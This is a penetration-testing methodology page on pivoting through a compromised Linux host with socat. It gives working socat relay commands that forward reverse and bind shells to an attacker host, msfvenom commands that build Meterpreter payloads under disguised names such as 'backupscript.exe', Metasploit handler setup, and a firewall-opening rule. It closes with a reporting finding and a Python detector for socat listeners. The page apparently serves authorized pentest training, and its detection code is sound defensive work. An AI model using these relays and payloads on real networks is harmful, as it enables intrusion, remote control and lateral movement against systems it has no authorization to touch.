Methodology Checklist
- Confirm socat is available on pivot (or upload static binary)
- TCP relay: socat TCP-LISTEN:[PORT],fork TCP:[DEST_IP]:[DEST_PORT]
- Verify relay listening: ss -tlnp | grep [PORT]
- Connect from attacker directly to pivot:[PORT] as if it were dest
- UDP relay: replace TCP with UDP in socat syntax
- Background socat with & if needed
- Kill socat relay on pivot when finished
Operational Context
Use when: Simple one-hop TCP relay needed on Linux pivot; socat creates a bidirectional relay between ports without installing anything complex.
Think Dumber First: socat TCP-LISTEN:[PORT],fork TCP:[INTERNAL_IP]:[INTERNAL_PORT] is a single-command relay on the pivot. Attack box connects to [PIVOT]:[PORT] and gets forwarded to the internal target transparently.
Skip when: Multi-hop pivoting needed; socat handles single hops, so chain with SSH or Chisel for multi-hop.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| socat TCP4-LISTEN:[PIVOT_PORT],fork TCP4:[LHOST]:[LPORT] | Reverse shell relay: forward incoming connections to attack host |
| socat TCP4-LISTEN:[PIVOT_PORT],fork TCP4:[INTERNAL_IP]:[TARGET_PORT] | Bind shell relay: bridge attack host to internal bind shell |
| msfvenom -p windows/x64/meterpreter/reverse_https LHOST=[PIVOT_LAN_IP] LPORT=[PIVOT_PORT] -f exe -o shell.exe | Generate payload pointing to pivot (not attack host) |
Deep Dive & Workflow
When to Use Socat
Use socat when SSH is unavailable/blocked on the pivot host. It works as a standalone relay binary requiring no SSH keys or credentials; just a shell on the pivot.
Traffic flow (reverse shell):
[Windows Target] → connects to Pivot:8080 → [Socat relay] → forwards to Attacker:80 → [Metasploit]
Traffic flow (bind shell):
[Attacker] → connects to Pivot:8080 → [Socat relay] → forwards to Target:8443 → [Bind shell]
Reverse Shell Relay
```
# 1. Start socat relay on pivot host
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
# fork = critical: without it, socat dies after first connection attempt

# 2. Generate payload on attack host
# LHOST = PIVOT's internal IP (what target can reach)
# LPORT = port socat is listening on
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 LPORT=8080 -f exe -o backupscript.exe

# 3. Catch on attack host (msfconsole)
# LPORT = what socat forwards TO (port 80, not 8080)
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0; set lport 80; run

# 4. Transfer and execute payload on target
```
Port alignment critical:
- Payload → pivot port (8080): what target connects to
- Socat → attack port (80): where socat sends it
- Handler → attack port (80): must match socat's destination
Bind Shell Relay
```
# 1. Generate bind payload for target
msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupjob.exe LPORT=8443

# 2. Execute on target (it waits for connections on 8443)

# 3. Start socat relay on pivot
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443

# 4. Configure handler on attack host (msfconsole)
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 10.129.202.64   # pivot IP (you connect to pivot, not target)
set LPORT 8080            # pivot's socat port
run
```
Critical Notes
| Component | Setting | Why |
|---|---|---|
| fork option | Always include | Without it socat terminates after one connection attempt |
| Payload LHOST | Pivot LAN IP | Target cannot route to attack host VPN IP |
| Listener LPORT | Must match socat destination | Mismatched port = silent failure |
| Handler RHOST | Pivot IP (bind shell) | You connect to pivot, which forwards to target |
Firewall: Socat's listen port must be reachable on the pivot. If iptables blocks it, open with iptables -I INPUT -p tcp --dport 8080 -j ACCEPT (requires root on pivot). High ports (>1024) avoid the privilege requirement.
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| socat not found | Not installed | Install: apt install socat; or transfer static binary: socat static builds available for most architectures |
| socat relay drops after first connection | Missing fork | Add fork option: socat TCP-LISTEN:[PORT],fork TCP:[DEST]:[PORT]; without fork, only one connection served |
| socat SSL relay cert errors | Self-signed cert | Generate: openssl req -newkey rsa:2048 -nodes -keyout server.key -x509 -days 1 -out server.crt && cat server.key server.crt > server.pem |
| UDP relay not working | TCP-specific command | For UDP: socat UDP-LISTEN:[PORT],fork UDP:[DEST]:[PORT] |
| socat process consuming high CPU | Many connections or large data | Reduce concurrent connections; socat is single-threaded per process; run multiple instances |
Reporting Trigger
Finding Title: socat TCP Relay Extends Attack Reach to Internal Network Services
Impact: socat relay on a compromised pivot host provides transparent TCP forwarding to internal services, enabling direct connection to internal RDP, SSH, databases, and admin interfaces from an external attacker position.
Root Cause: No monitoring for socat relay processes or unusual listening ports on compromised hosts. Internal services reachable from the compromised host without segmentation.
Recommendation: Implement process monitoring to detect socat execution on production hosts. Alert on unexpected listening TCP ports. Enforce network ACLs preventing internal services from being accessed from non-management hosts.
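An added detection-side example, not part of the original notes: a small Python checker that parses the output of ss -tlnp (the same command the checklist uses to verify the relay is listening) and flags socat listeners or non-loopback ports outside a host baseline, which is what the Recommendation above asks for. The sample ss output and the EXPECTED_PORTS baseline are constructed for illustration.

```python
import re
from collections import namedtuple

# Constructed sample of `ss -tlnp` output in the shape a Linux host prints;
# not captured from any real system. The socat row models the relay above.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       5       0.0.0.0:8080         0.0.0.0:*          users:(("socat",pid=4242,fd=5))
LISTEN  0       128     127.0.0.1:5432       0.0.0.0:*          users:(("postgres",pid=900,fd=7))
LISTEN  0       128     [::]:22              [::]:*             users:(("sshd",pid=812,fd=4))
"""
# Hypothetical per-host baseline: ports this host is approved to expose.
EXPECTED_PORTS = {22, 5432}
# Binaries that act as ad-hoc relays; socat is the one this page covers.
RELAY_BINARIES = {"socat"}

# One LISTEN row: local addr:port, peer addr, optional users:(("name",pid=N,...)).
LINE_RE = re.compile(
    r"^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+"
    r'(?:\s+users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+))?'
)
# proc/pid are None when ss could not resolve the owner (e.g. run without root).
Listener = namedtuple("Listener", "addr port proc pid")

def parse_ss(output):
    """Parse `ss -tlnp` text into Listener records, skipping the header row."""
    listeners = []
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if m:
            pid = m.group("pid")
            listeners.append(Listener(m.group("addr"), int(m.group("port")),
                                      m.group("proc"), int(pid) if pid else None))
    return listeners

def find_suspicious(listeners, expected_ports=EXPECTED_PORTS):
    """Return (listener, reason) pairs: relay binaries, and non-loopback
    listeners on ports outside the baseline (loopback-only services are ignored)."""
    findings = []
    for lst in listeners:
        reasons = []
        if lst.proc in RELAY_BINARIES:
            reasons.append(f"relay binary {lst.proc} (pid {lst.pid}) is listening")
        if lst.port not in expected_ports and not lst.addr.startswith("127."):
            reasons.append(f"unexpected external listener on port {lst.port}")
        if reasons:
            findings.append((lst, "; ".join(reasons)))
    return findings
```

Feeding it live output (for example parse_ss(subprocess.check_output(["ss", "-tlnp"], text=True))) from a cron job or EDR script gives the "alert on unexpected listening TCP ports" control; the process-name check catches the relay even when it lands on an allowed port.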